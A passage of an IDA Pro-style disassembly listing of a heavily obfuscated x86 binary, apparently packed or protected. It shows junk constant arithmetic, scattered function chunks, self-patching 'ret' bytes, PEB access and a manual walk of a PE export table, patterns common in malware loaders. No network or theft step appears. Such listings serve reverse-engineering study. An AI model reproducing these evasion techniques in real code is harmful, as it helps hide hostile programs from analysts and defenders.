sub_450EE2	proc near		; CODE XREF: sub_43DE01+1Bp
					; hvvrg7ie:00450704j
		xchg	eax, [esp+0]
		pop	eax
		mov	[ebx], eax
		pop	ebx
		lea	eax, nullsub_346
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_346
sub_450EE2	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_450EF7	proc near		; CODE XREF: sub_419A09+8Bp
					; sub_450EF7:loc_44EC0Bj
					; DATA XREF: ...

; FUNCTION CHUNK AT 0044EC0B SIZE 00000006 BYTES

		call	sub_44EC16
		jmp	loc_44EC0B
sub_450EF7	endp


; =============== S U B	R O U T	I N E =======================================



sub_450F01	proc near		; CODE XREF: hvvrg7ie:0043D017j
					; hvvrg7ie:0044E502p
		xchg	eax, [esp+0]
		pop	eax
		mov	byte ptr [eax],	0C3h
		jmp	loc_43D208
sub_450F01	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F98C

loc_450F0D:				; CODE XREF: sub_43F98C-2783j
		mov	eax, [esp-4+arg_0]
		push	edi
		mov	edi, edx
		xchg	edi, [esp+0]
		push	eax
		jmp	loc_45A114
; END OF FUNCTION CHUNK	FOR sub_43F98C
; ---------------------------------------------------------------------------

loc_450F1C:				; CODE XREF: hvvrg7ie:00442681j
		add	ecx, 0A096ABh
		xchg	ecx, [esp]
		lea	eax, [ebp-800h]
		call	sub_44AFD7

loc_450F30:				; CODE XREF: hvvrg7ie:0044D2C1j
		jmp	loc_443D51
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8AB

loc_450F35:				; CODE XREF: hvvrg7ie:004395D1j
					; sub_43F8AB+B63Cj
		push	eax
		call	sub_43E7F3
		retn
; END OF FUNCTION CHUNK	FOR sub_43F8AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BCD

loc_450F3C:				; CODE XREF: sub_443BCD+737Ej
		jmp	loc_452841
; END OF FUNCTION CHUNK	FOR sub_443BCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F447

loc_450F41:				; CODE XREF: sub_43F447+15j
		jmp	loc_44FD7E
; END OF FUNCTION CHUNK	FOR sub_43F447
; ---------------------------------------------------------------------------

loc_450F46:				; CODE XREF: hvvrg7ie:0044F597j
		call	sub_439549
		push	offset sub_440195
		jmp	loc_446709
; ---------------------------------------------------------------------------

loc_450F55:				; CODE XREF: hvvrg7ie:loc_459EBFj
		jge	loc_44FBD5
; START	OF FUNCTION CHUNK FOR sub_458A13

loc_450F5B:				; CODE XREF: sub_458A13-C917j
		jmp	loc_442808
; END OF FUNCTION CHUNK	FOR sub_458A13
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_450F60:				; CODE XREF: sub_4408AE+8D6Fj
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_4408AE
; ---------------------------------------------------------------------------
		db 13h,	0DEh, 0Fh
		dd 0FF40D78Ah, 0EC5EE9FFh, 0D8E9FFFFh, 68000007h, 71E0717h
		dd 34E08158h, 0C10C49A4h, 0F08118C0h, 3CC3A93Ch, 1B8DE9h
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_384. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_450F92:				; CODE XREF: hvvrg7ie:0044084Bj
		jmp	loc_43D40B

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_450F97	proc near		; CODE XREF: hvvrg7ie:00442E01p
					; sub_456F9F-F33Ap ...

var_20		= byte ptr -20h
var_18		= byte ptr -18h
var_10		= byte ptr -10h
var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439912 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043B067 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0043C73C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043D65E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D772 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043DE3E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043E5D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FAFA SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00441654 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004434F3 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00443AE8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443EEA SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044496C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004455C4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044651F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004472B4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447FC3 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00448428 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00448981 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00448A6D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00449C6F SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044AB73 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B2A9 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044C6FC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CA1B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D021 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FDD0 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452078 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004538CD SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00453D38 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045519C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004553EB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456B70 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457543 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045763A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00457C78 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A148 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045B12C SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	esi
		jmp	loc_457543
sub_450F97	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_450FA0:				; CODE XREF: sub_43F227:loc_43D10Aj
					; sub_43F227+2729j ...
		jo	loc_450991
		cmp	dword ptr [ebp-4], 6
		jnz	loc_44930B
		jmp	loc_456FD6
; END OF FUNCTION CHUNK	FOR sub_43F227

; =============== S U B	R O U T	I N E =======================================



sub_450FB5	proc near		; CODE XREF: hvvrg7ie:0044A757j
					; sub_4533F2+80AAp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043DF5B SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		call	sub_43FC15
		mov	eax, [esp-4+arg_0]
		push	eax
		push	offset sub_448BE8
		jmp	loc_43DF5B
sub_450FB5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_450FCC:				; CODE XREF: sub_446D8D-74A2j
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_455744
		jmp	loc_442B02
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_450FDE:				; CODE XREF: sub_4465A6+3682j
		pushf
		sbb	eax, 0E4BFC6CDh
		mov	eax, [edx]
		jmp	loc_446F08
; END OF FUNCTION CHUNK	FOR sub_4465A6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_537. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448620

loc_450FED:				; CODE XREF: sub_448620+1Cj
		jmp	loc_44A3C7
; END OF FUNCTION CHUNK	FOR sub_448620

; =============== S U B	R O U T	I N E =======================================



sub_450FF2	proc near		; CODE XREF: sub_445BE8+5C75p
					; hvvrg7ie:loc_456933j

; FUNCTION CHUNK AT 0043C7FB SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044B231 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044DC6C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044E070 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455D4E SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		movzx	edx, byte ptr [ecx+edx]
		and	eax, edx
		jnz	loc_43FA8C
		jmp	loc_44E070
sub_450FF2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_451007:				; CODE XREF: hvvrg7ie:00452419j
		mov	eax, ebx
		jmp	loc_43AEC4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439873

loc_45100E:				; CODE XREF: sub_439873:loc_43C3D7j
		mov	ecx, [ebx+3Ch]
		mov	ecx, [ebx+ecx+78h]
		or	ecx, ecx
		jz	loc_43BA03
		jmp	loc_459CA6
; END OF FUNCTION CHUNK	FOR sub_439873
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E44E

loc_451022:				; CODE XREF: sub_44E44E+Aj
		neg	eax
		mov	[ebp-5], al
		jmp	loc_443D26
; END OF FUNCTION CHUNK	FOR sub_44E44E
; ---------------------------------------------------------------------------

loc_45102C:				; CODE XREF: hvvrg7ie:loc_45747Dj
		push	37EADDFAh
		pop	eax
		xor	eax, 84DED3A6h
		cmp	eax, 183BDC9Dh
		jmp	loc_4419FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443B00

loc_451043:				; CODE XREF: sub_443B00:loc_451765j
		or	eax, 7B160E32h
		add	eax, 35BFB1FAh
		xor	eax, 0D378F247h
		add	eax, ebp
		jmp	loc_44EE35
; END OF FUNCTION CHUNK	FOR sub_443B00
; ---------------------------------------------------------------------------
		jmp	ds:off_41D080
; ---------------------------------------------------------------------------

loc_451062:				; CODE XREF: hvvrg7ie:0044997Dj
		jmp	loc_4509F3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A97

loc_451067:				; CODE XREF: sub_457A97:loc_43A536j
					; sub_45970D:loc_4479DBj ...
		jno	loc_457AA3
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_4562DC
		mov	eax, 4AC5B528h
		jmp	loc_455060
; END OF FUNCTION CHUNK	FOR sub_457A97
; ---------------------------------------------------------------------------

loc_451081:				; CODE XREF: hvvrg7ie:0043FAB0j
		test	ebx, edx
		jmp	loc_43F6F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_451088:				; CODE XREF: sub_43F227-536Bj
		test	esi, 100h
		jmp	loc_449375
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
		db 54h
byte_451094	db 1			; DATA XREF: sub_43D285+6r
					; sub_43D285+9B9Fw ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BA4

loc_451095:				; CODE XREF: sub_453BA4-174D7j
		jmp	loc_450C0D
; END OF FUNCTION CHUNK	FOR sub_453BA4
; ---------------------------------------------------------------------------
		dw 0C51h
dword_45109C	dd 0C6468EB9h, 0D819C563h ; DATA XREF: sub_43D285:loc_439FA9o
					; sub_456423:loc_43D003o
		db 0C6h, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_4510A6:				; CODE XREF: sub_43D285+D2A2j
		jmp	loc_43A53B
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D9F9

loc_4510AB:				; CODE XREF: sub_43D9F9+10j
		jmp	loc_45B787
; END OF FUNCTION CHUNK	FOR sub_43D9F9
; ---------------------------------------------------------------------------
dword_4510B0	dd 77F50000h		; DATA XREF: sub_43D285:loc_446E1Fw
					; sub_454F91:loc_454F9Cr
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45061E

loc_4510B4:				; CODE XREF: sub_45061E-EF73j
		jmp	loc_441385
; END OF FUNCTION CHUNK	FOR sub_45061E
; ---------------------------------------------------------------------------
		db 0E1h, 0Eh, 18h
dword_4510BC	dd 0			; DATA XREF: sub_44106C+7w
					; sub_44107D+C140r ...
; ---------------------------------------------------------------------------

loc_4510C0:				; DATA XREF: hvvrg7ie:0045B515o
		xor	eax, 8E8FA8Eh
		add	eax, ebp
		push	edi
		push	2146F593h
		pop	edi
		or	edi, ds:4000F7h
		jnz	loc_439709
		pushf
		jmp	loc_45A6A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_4510E1:				; CODE XREF: sub_4544DD:loc_439ECCj
		jz	loc_44E5A3
		jmp	loc_442D85
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------

loc_4510EC:				; CODE XREF: hvvrg7ie:loc_45A57Bj
		ror	edx, 1Ah
		jmp	loc_45AA4C
; ---------------------------------------------------------------------------
		shr	ebp, 16h
		jmp	sub_452238
; ---------------------------------------------------------------------------
		pop	edx
		jmp	loc_44E45D
; ---------------------------------------------------------------------------

loc_451102:				; CODE XREF: hvvrg7ie:0044B353j
		jz	loc_457FA9
		jmp	loc_4484B3
; ---------------------------------------------------------------------------

loc_45110D:				; CODE XREF: hvvrg7ie:00447032j
		rol	esi, 1Ch

; =============== S U B	R O U T	I N E =======================================



sub_451110	proc near		; CODE XREF: sub_455087+41F7p

; FUNCTION CHUNK AT 00442FA2 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00447971 SIZE 0000000C BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	eax, ebp
		push	ecx
		call	sub_4544AA

loc_45111C:				; CODE XREF: sub_451E6D:loc_441536j
					; sub_442B3C+685Ej
		jmp	loc_447971
sub_451110	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BCD

loc_451121:				; CODE XREF: sub_443BCD+1DA5j
		jmp	loc_44A4F6
; END OF FUNCTION CHUNK	FOR sub_443BCD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_328. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448663

loc_451127:				; CODE XREF: sub_448663:loc_44D44Bj
		or	eax, eax
		jnz	loc_44EDE7
		jmp	loc_440BD2
; END OF FUNCTION CHUNK	FOR sub_448663
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_281. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F6B

loc_451135:				; CODE XREF: sub_442F6B+53FBj
		jmp	nullsub_479
; END OF FUNCTION CHUNK	FOR sub_442F6B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_45113A:				; CODE XREF: sub_45A234-1DABj
		jnb	loc_43DE68

loc_451140:				; CODE XREF: sub_45A234-1DB9j
		rol	eax, 0Ah
		xor	eax, 0BF078158h
		add	eax, ebp
		add	eax, 88F41E2Ah
		mov	eax, [eax]
		push	eax
		jmp	loc_43DEF5
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------

loc_451159:				; CODE XREF: hvvrg7ie:0044EA21j
		xor	eax, 0B7927C4Ah
		push	offset sub_439190
		jmp	loc_449737
; ---------------------------------------------------------------------------
		not	ebx
		jmp	sub_44F39A
; ---------------------------------------------------------------------------

loc_451170:				; CODE XREF: hvvrg7ie:00442B37j
		jz	loc_441918

; =============== S U B	R O U T	I N E =======================================



sub_451176	proc near		; CODE XREF: sub_43A0EC:loc_4467A3p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043FB7F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044102D SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00442F83 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00442F97 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442FEF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445A2A SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00447A4B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044AA56 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C0B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D0D8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450A32 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004513F8 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004532DA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458505 SIZE 00000010 BYTES

		xchg	ecx, [esp-4+arg_0]
		pop	ecx
		jnb	loc_43E279
		test	byte ptr [ebp-7], 8
		jz	loc_451CDB
		push	ebp
		mov	eax, [ebp-20h]
		jmp	loc_4532DA
sub_451176	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E56

loc_451193:				; CODE XREF: sub_443E56:loc_44896Cj
		push	edx
		call	sub_43C836
		push	85F1BBC1h
		pop	eax
		sub	eax, 6A6E005Eh
		xor	eax, 0E4240726h
		jmp	loc_459397
; END OF FUNCTION CHUNK	FOR sub_443E56
; ---------------------------------------------------------------------------

loc_4511B0:				; CODE XREF: hvvrg7ie:loc_445197j
		and	edx, ecx
		rol	ebx, 16h
		add	ecx, 834E3B2Dh
		pop	ebx
		xchg	edi, [esp]
		jmp	loc_448331
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_44E69F
; ---------------------------------------------------------------------------
		jmp	ds:off_41D0B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446FC5

loc_4511D0:				; CODE XREF: sub_446FC5-66A0j
					; sub_446FC5+E096j ...
		jz	loc_457B45
		xchg	edi, [esp+4+var_4]
		mov	edx, edi
		pop	edi
		mov	eax, [esp+0]
		jmp	loc_43C9E9
; END OF FUNCTION CHUNK	FOR sub_446FC5
; ---------------------------------------------------------------------------
		push	0FD1110BCh
		pop	eax
		rol	eax, 11h
		sub	eax, 468E6D73h
		and	eax, 5F51D651h
		or	eax, 0DBB92BD4h
		add	eax, 7654A579h
		jmp	loc_43C7D5
; ---------------------------------------------------------------------------
		dw 860Fh
		dd 0FFFFBD13h, 0FFE9EE85h
		db 0B2h, 0FEh, 0FFh
; ---------------------------------------------------------------------------

loc_451217:				; DATA XREF: hvvrg7ie:0043FB75o
		call	sub_44F66B
		call	sub_4563DC

loc_451221:				; CODE XREF: hvvrg7ie:0045744Dj
		jmp	sub_449007
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4425F0

loc_451226:				; CODE XREF: sub_4425F0:loc_454293j
		pop	edx
		sub	edx, 9EAC81A6h
		rol	edx, 4
		xor	edx, 65FF0BA4h
		add	edx, ebp

loc_451238:				; CODE XREF: sub_43B6A5:loc_43EBF5j
		add	edx, 0A69F6BD7h
		mov	[edx], eax
		jmp	loc_449C00
; END OF FUNCTION CHUNK	FOR sub_4425F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447162

loc_451245:				; CODE XREF: sub_447162+F927j
		add	edx, 0C57A646Ch
		mov	[edx], eax
		pop	edx
		mov	eax, [ebp+var_4]
		mov	al, [eax]
		jns	loc_4514CA
		sub	al, 99h
		jmp	loc_45A5FD
; END OF FUNCTION CHUNK	FOR sub_447162
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AE41

loc_451260:				; CODE XREF: sub_43AE41+8E52j
		xchg	ebx, [esi]

loc_451262:				; CODE XREF: sub_43AE41:loc_443C84j
		call	sub_4484B9
; END OF FUNCTION CHUNK	FOR sub_43AE41
; START	OF FUNCTION CHUNK FOR sub_443375

loc_451267:				; CODE XREF: sub_443375+8A49j
		push	7440FF87h
		mov	ebp, eax
		not	eax
		jmp	loc_4441A8
; END OF FUNCTION CHUNK	FOR sub_443375
; ---------------------------------------------------------------------------

loc_451275:				; CODE XREF: hvvrg7ie:loc_44F64Aj
		add	edi, 4F61815Fh
		mov	[edi], eax
		pop	edi
		cmp	dword ptr [ebp-4], 0
		jz	loc_44A3DE
		jmp	loc_442AF1

; =============== S U B	R O U T	I N E =======================================



sub_45128D	proc near		; CODE XREF: hvvrg7ie:0043F821j
					; sub_440643:loc_4508FAp
		xchg	ecx, [esp+0]
		pop	ecx
		rol	eax, 3
		push	edi
		mov	edi, eax
		xchg	edi, [esp+0]
		retn
sub_45128D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_45129B:				; CODE XREF: sub_44D2F8+6877j
		jmp	loc_441955
; END OF FUNCTION CHUNK	FOR sub_44D2F8

; =============== S U B	R O U T	I N E =======================================



sub_4512A0	proc near		; CODE XREF: sub_44A994+1p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043945F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C08F SIZE 00000030 BYTES
; FUNCTION CHUNK AT 00440A3C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044141F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004465B3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044899A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449BCF SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044B37C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D543 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044FB6D SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004505B8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045267C SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00454FEB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00455BB7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459CCF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A959 SIZE 00000005 BYTES

		push	ebp
		jmp	loc_4505B8
sub_4512A0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446829

loc_4512A6:				; CODE XREF: sub_446829+1Dj
		add	eax, 0A1F62202h
		call	sub_450C5A
		push	edi
		push	0AF869B78h
		jmp	loc_457297
; END OF FUNCTION CHUNK	FOR sub_446829

; =============== S U B	R O U T	I N E =======================================



sub_4512BC	proc near		; DATA XREF: sub_443BCD-1C6o
		mov	ds:dword_452334, eax
		retn
sub_4512BC	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455ACA

loc_4512C3:				; CODE XREF: sub_455ACA:loc_455A5Bj
		rol	eax, 11h
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_455ACA
; ---------------------------------------------------------------------------

loc_4512C8:				; CODE XREF: hvvrg7ie:0043C9E4j
		jmp	loc_45881A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440195

loc_4512CD:				; CODE XREF: sub_440195+2j
		call	sub_448768
		push	offset sub_44B1C6
		jmp	loc_43CAB6
; END OF FUNCTION CHUNK	FOR sub_440195
; ---------------------------------------------------------------------------
		jmp	ds:dword_41D000
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_308. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		add	al, 24h
		mov	edx, eax
		pop	eax
		jmp	loc_452DD8
; ---------------------------------------------------------------------------
		and	ebp, ecx
		jmp	sub_44AFD7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB53

loc_4512F4:				; CODE XREF: sub_44DB53+3CACj
		shl	ecx, 1Eh
		shr	ecx, 1Dh
		jmp	loc_45B0FA
; END OF FUNCTION CHUNK	FOR sub_44DB53
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454789

loc_4512FF:				; CODE XREF: sub_454789:loc_451907j
		add	ebx, 2052397Fh
		mov	[ebx], eax
		call	sub_45269F

loc_45130C:				; DATA XREF: sub_43BFCF:loc_43C4A2o
		mov	eax, ds:dword_45388C
		call	sub_440059
; END OF FUNCTION CHUNK	FOR sub_454789
; START	OF FUNCTION CHUNK FOR sub_45488E

loc_451316:				; CODE XREF: sub_45488E+15DDj
		jmp	loc_44C3B6
; END OF FUNCTION CHUNK	FOR sub_45488E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F78

loc_45131B:				; CODE XREF: sub_452F78+2524j
		jmp	sub_43D16B
; END OF FUNCTION CHUNK	FOR sub_452F78
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4405AA

loc_451320:				; CODE XREF: sub_4405AA:loc_44E2F6j
		xor	eax, 2F61F9Eh
		jmp	loc_44C0CF
; END OF FUNCTION CHUNK	FOR sub_4405AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_45132B:				; CODE XREF: sub_44D2F8:loc_450A6Bj
		jle	loc_44FC42
		cmp	eax, 0DDD1A7D2h
		jmp	loc_44FF5A
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_45133C:				; CODE XREF: sub_450434-E2B1j
		cdq
		jo	loc_44843D
		sbb	ecx, ebp

loc_451345:				; CODE XREF: sub_450434-E2BFj
		sub	edx, 7F7C1F2Dh
		jmp	loc_457FC7
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440603

loc_451350:				; CODE XREF: sub_440603:loc_44670Ej
		and	esi, 0BAD44F89h
		add	esi, 0E7ED8EF3h
		mov	[esi], eax
		pop	esi
		lea	eax, sub_43F272
		mov	byte ptr [eax],	0C3h
		jmp	loc_44FF95
; END OF FUNCTION CHUNK	FOR sub_440603
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_445. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_45136E:				; CODE XREF: sub_44388C-46DEj
		jmp	loc_43C031
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_451373:				; CODE XREF: hvvrg7ie:00441AF2j
					; sub_45B048+17j
		jz	loc_44ED78
		mov	eax, large fs:30h
		add	eax, 20h
		mov	eax, [eax]
		jmp	loc_44A30D
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AB9D

loc_45138A:				; CODE XREF: sub_45AB9D:loc_45331Ej
		add	eax, 5DC177D1h
		add	eax, ebp
		add	eax, 0A458484Eh
		mov	eax, [eax]
		mov	al, [eax]
		jb	loc_445645
		jmp	loc_45B212
; END OF FUNCTION CHUNK	FOR sub_45AB9D

; =============== S U B	R O U T	I N E =======================================



sub_4513A7	proc near		; CODE XREF: hvvrg7ie:0043B257j
					; sub_4498AE-6C1Ep

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0045AE04 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	edx, 4576A83Ah
		xchg	edx, [esp-4+arg_0]
		jmp	loc_45AE04
sub_4513A7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F33

loc_4513B9:				; CODE XREF: sub_458F33:loc_439D7Aj
		pop	eax
		sub	eax, 66D6B8E3h
		or	eax, 2F1F22Dh
		xor	eax, 0EC465C3Ah
		jmp	loc_43E712
; END OF FUNCTION CHUNK	FOR sub_458F33
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CD4

loc_4513D1:				; CODE XREF: sub_456CD4-1783Aj
		pop	ecx
		sub	eax, 0DC1FD565h
		add	eax, 0A03A5B07h
		popf
		pushf
		push	edi
		jmp	loc_43A983
; END OF FUNCTION CHUNK	FOR sub_456CD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AFD7

loc_4513E6:				; CODE XREF: sub_44AFD7:loc_45675Ej
		call	sub_4592BF
		test	eax, eax
		jz	loc_456B5D
		jmp	loc_44E0E9
; END OF FUNCTION CHUNK	FOR sub_44AFD7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451176

loc_4513F8:				; CODE XREF: sub_451176:loc_44AA56j
		xor	eax, 8584643Eh
		add	eax, ebp
		add	eax, 0CBCF0D82h
		mov	eax, [eax]
		call	sub_43FD2B

loc_45140D:				; CODE XREF: sub_455701+16j
		jmp	loc_450A32
; END OF FUNCTION CHUNK	FOR sub_451176
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4538F3

loc_451412:				; CODE XREF: sub_4538F3+6j
		jmp	loc_44F858
; END OF FUNCTION CHUNK	FOR sub_4538F3
; ---------------------------------------------------------------------------

loc_451417:				; CODE XREF: hvvrg7ie:00450558j
		jmp	nullsub_442
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D46F

loc_45141C:				; CODE XREF: sub_44D46F+6j
		mov	[ebp+var_4], eax
		push	offset loc_44A937
		jmp	nullsub_138
; END OF FUNCTION CHUNK	FOR sub_44D46F

; =============== S U B	R O U T	I N E =======================================



